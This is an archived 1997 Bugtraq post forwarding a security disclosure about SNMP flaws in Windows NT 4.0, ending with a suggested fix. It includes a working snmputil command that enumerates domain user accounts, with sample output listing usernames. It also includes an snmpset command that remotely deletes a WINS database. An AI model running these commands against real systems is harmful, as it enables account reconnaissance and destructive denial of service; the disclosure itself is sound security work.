SNMP holes in Windoze NT 4.0

Date: Wed, 8 Oct 1997 19:08:37 -0500
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: SNMP Insecurity

---------- Forwarded message ----------
Date: Tue, 7 Oct 1997 15:36:13 -0400
From: "Rouland, Christopher J" <CRouland@EXAMNYC.lehman.com>
To: "'ntsecurity@iss.net'" <ntsecurity@iss.net>
Subject: [NTSEC] SNMP Insecurity

All:

I have found two significant "features" in the SNMP agent
implementations under NT 4.0 Server, and I am sure there are more if I
feel like really digging.  The first issue I sent in earlier this year
to Microsoft and received no response other than "expected behavior" and
the second I just found and puts any large NT shop at a serious denial
of service (DOS) risk.

1. This first exploit demonstrates the ability via SNMP to dump a list
of all usernames in an NT domain (assuming the target box is a DC) or on
an NT Server.

Here is the simplest NT example I could find to use this:

C:\NTRESKIT>snmputil walk <hostname> public .1.3.6.1.4.1.77.1.2.25

<hostname> should be a domain controller or server

Sample output at end of message.

2.The second exploit demonstrates the ability via SNMP to delete all of
the records in a WINS database remotely, bypassing all NT security.  If
you understand large scale WINS architecture, you can understand the
implications of this.  Knowledge of SNMP community strings would allow
an attacker to effectively shut down any large NT infrastructure with
"N" commands (N=number of WINS servers).  This is permitted due to the
extensive "cmd" set implemented in the WINS extension agent,
specifically:

 cmdDeleteWins OBJECT-TYPE
              SYNTAX  IpAddress
              ACCESS  read-write
              STATUS  mandatory
              DESCRIPTION
                        "This variable when set will cause all
information
                         pertaining to a WINS (data records, context
                         information to be deleted from the local WINS.
                         Use this only when owner-address mapping table
is
                         getting to near capacity. NOTE: deletion of all

                         information pertaining to the managed WINS is
not
                         permitted"
              ::= { cmd 3 }

Since the SNMP toolset implemented under NT will not do
snmp-set-requests, my sample exploit was done using the CMU SNMP
development kit under Unix.  The command "rnjdev02:~/cmu$ snmpset -v 1
192.178.16.2 public .1.3.6.1.4.1.311.1.2.5.3.0 a 192.178.16.2"
successfully entirely deleted my WINS database.


3.  It appears that there are several other pieces of the LMMIB2
definition that allow for things such as remote session deletion or
disconnect, etc, but I have not yet looked into them.

4.   The simplest fix is to disable SNMP, or to remove the extension
agents through the SNMP configuration in the registry.


Regards,

Chris

--
Chris Rouland
Lehman Brothers, Inc.
crouland@lehman.com

-----


        C:\NTRESKIT>snmputil walk 192.178.16.2 public
.1.3.6.1.4.1.77.1.2.25

        Output:



Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.71.117.101.115.116
Value    = OCTET STRING - Guest

Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.116.101.115.116.49
Value    = OCTET STRING - test1

Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.116.101.115.116.50
Value    = OCTET STRING - test2

Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.116.101.115.116.51
Value    = OCTET STRING - test3

Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.116.101.115.116.52
Value    = OCTET STRING - test4

Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.116.101.115.116.53
Value    = OCTET STRING - test5

Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.116.101.115.116.54
Value    = OCTET STRING - test6

Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.116.101.115.116.55
Value    = OCTET STRING - test7

Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.116.101.115.116.56
Value    = OCTET STRING - test8

Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.116.101.115.116.57
Value    = OCTET STRING - test9

Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.6.116.101.115.116.49.48
Value    = OCTET STRING - test10

Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.8.116.101.115.116.117.115.101.114
Value    = OCTET STRING - testuser

Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.13.65.100.109.105.110.105.115.116.114.97
.116.111.114
Value    = OCTET STRING - Administrator

Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.13.73.85.83.82.95.82.78.74.68.69.86.48.4
9
Value    = OCTET STRING - IUSR_NT4SRVDEV1

Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.19.83.81.76.69.120.101.99.117.116.105.11
8.101.67.109.100.69.120.101.99
Value    = OCTET STRING - SQLExecutiveCmdExec

End of MIB subtree.